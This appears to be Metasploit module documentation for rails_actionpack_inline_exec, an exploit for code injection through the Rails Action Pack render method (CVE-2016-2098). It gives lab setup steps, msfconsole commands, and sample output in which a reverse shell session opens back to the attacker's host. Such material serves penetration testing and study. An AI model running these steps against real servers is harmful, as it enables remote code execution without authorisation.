rails_actionpack_inine_exec is a module that exploits the render method in Action Pack.
Applications that pass unverified user input to the ```render``` method in a controller
or view may be vulnerable to code injection.

## Vulnerable Application

Action Pack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2 use unsafe dynamic rendering.

## Verification Steps

Assuming you have the right requirements to run a rails server, you can use the following fork
to set up the vulnerable server for testing:

1. Do: ```git clone https://github.com/wchen-r7/dh-CVE_2016_2098.git```
2. Do: ```bundle install```
3. Do: ```rails -s -b 0.0.0.0```
4. Start msfconsole
5. Do: ```use exploit/multi/http/rails_actionpack_inline_exec```
6. Do: ```set RHOST [rails server IP]```
7. Do: ```set RPORT 3000```. 3000 is the default port for the rails server.
8. Do: ```set targeturi /exploits```
9. Configure the rest of the options (for the modules or the payload)
10. Do: ```exploit```, and you should get a session:

```
msf exploit(rails_actionpack_inline_exec) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Sending inline code to parameter: id
[*] Command shell session 1 opened (192.168.146.1:4444 -> 192.168.146.161:56661) at 2016-07-07 15:56:00 -0500
```

## Options

To use this module, you must manually discover the correct values for these datastore options:

**TARGETURI**

The path to a vulnerable Ruby on Rails application.

**TARGETPARAM**

The target parameter to inject with inline code.
